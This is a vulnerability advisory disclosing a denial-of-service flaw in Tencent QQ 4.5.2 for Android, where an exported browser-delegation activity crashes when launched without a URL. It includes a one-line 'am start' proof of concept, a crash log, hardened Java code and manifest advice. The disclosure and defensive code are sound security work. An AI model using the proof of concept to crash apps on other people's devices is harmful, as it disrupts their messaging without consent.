Tencent Messenger (QQ) DoS vulnerability (critical)

Vulnerability details

Disclosure status:

2014-01-07: Details reported to the vendor; awaiting the vendor's response
2014-01-08: The vendor chose to ignore the vulnerability; details opened to third-party security partners
2014-04-04: Details disclosed to the public

Brief description:

Tencent Messenger (QQ) version 4.5.2 contains a critical DoS vulnerability that needs to be addressed.

Detailed description:

The activity component com.tencent.mobileqq.activity.QQBrowserDelegationActivity is exported and can be invoked by any third-party application; launching it without the expected URL data causes the QQ process to crash.

Process name: com.tencent.mobileqq

Version: 4.5.2

Affected package: http://pan.baidu.com/s/1lEFzo

PoC:

am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity

Crash log:

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420): at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420): at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420): at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420): at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420): at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420): ... 11 more
W/ActivityManager( 78): Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService( 78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService( 78): unable to find stats for iface rmnet0
I/WindowManager( 78): createSurface Window{414395e0 paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager( 78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger( 78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager( 78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager( 78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager( 78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService
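The stack trace above shows the root cause: the activity reads a URL from the incoming intent and passes it straight to Uri.parse(), which throws a NullPointerException ("uriString") when the caller supplied no URL. The following is an added example, not QQ's code, of how an exported browser-delegation activity can validate untrusted intent input before using it, so that a bare "am start -n ..." launch finishes cleanly instead of killing the process. The extra name "url", the class name and the openInEmbeddedBrowser() hand-off are assumptions for illustration; QQ's real extra key is not given in this report.

```java
// Added example (not QQ's code): a hardened browser-delegation activity that
// validates the URL extra before it ever reaches Uri.parse(). Extra name "url"
// and the openInEmbeddedBrowser() hand-off are assumptions, not taken from QQ.
package example.hardened;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

import java.util.Locale;

public class SafeBrowserDelegationActivity extends Activity {
    private static final String TAG = "SafeBrowserDelegation";
    // Assumed extra name; the key QQ actually uses is not known from the advisory.
    static final String EXTRA_URL = "url";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri target = extractTargetUri(getIntent());
        if (target == null) {
            // Missing or invalid input from an untrusted caller: log it and exit
            // quietly instead of letting a NullPointerException kill the process.
            Log.w(TAG, "rejecting launch without a valid http(s) URL extra");
            finish();
            return;
        }
        openInEmbeddedBrowser(target);
    }

    /**
     * Returns a validated http/https Uri from the intent, or null when the intent
     * carries no usable URL. Every branch that returns null is one the original
     * code would have crashed on or blindly trusted.
     */
    static Uri extractTargetUri(Intent intent) {
        if (intent == null) {
            return null;
        }
        String raw = intent.getStringExtra(EXTRA_URL);
        if (raw == null || raw.trim().isEmpty()) {
            return null; // this is exactly the path that produced the NPE in the log
        }
        Uri uri = Uri.parse(raw.trim());
        String scheme = uri.getScheme();
        if (scheme == null) {
            return null;
        }
        scheme = scheme.toLowerCase(Locale.ROOT);
        // Only hand web URLs to the embedded browser; this also refuses file://,
        // content://, javascript: and intent: values from other apps.
        if (!"http".equals(scheme) && !"https".equals(scheme)) {
            return null;
        }
        String host = uri.getHost();
        if (host == null || host.isEmpty()) {
            return null;
        }
        return uri;
    }

    private void openInEmbeddedBrowser(Uri uri) {
        // Placeholder for the real hand-off (in QQ this is MttApi.loadUrlInMbWnd).
        Log.i(TAG, "would load " + uri);
    }
}
```

Input validation fixes the crash but not the exposure: if no third-party application legitimately needs to launch this activity, the stronger fix is to set android:exported="false" on its <activity> element in AndroidManifest.xml (or guard it with a signature-level permission), so that other packages cannot reach the component at all.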

Proof of vulnerability:

[Screenshot: DOS-QQ1.jpg]

[Screenshot: DOS-QQ2.jpg]

Remediation:

Copyright notice: please credit Pentest.mobi@WooYun when reposting


Vulnerability response

Vendor response:

Severity: no impact; ignored by vendor

Time ignored: 2014-01-08 10:07

Vendor reply:

Thank you very much for your report. The issue described in the report no longer exists in the new version; thank you for your attention to Tencent's services. If you have any questions, please send us feedback and we will have dedicated staff follow up.

Latest status:

None yet


Vulnerability rating: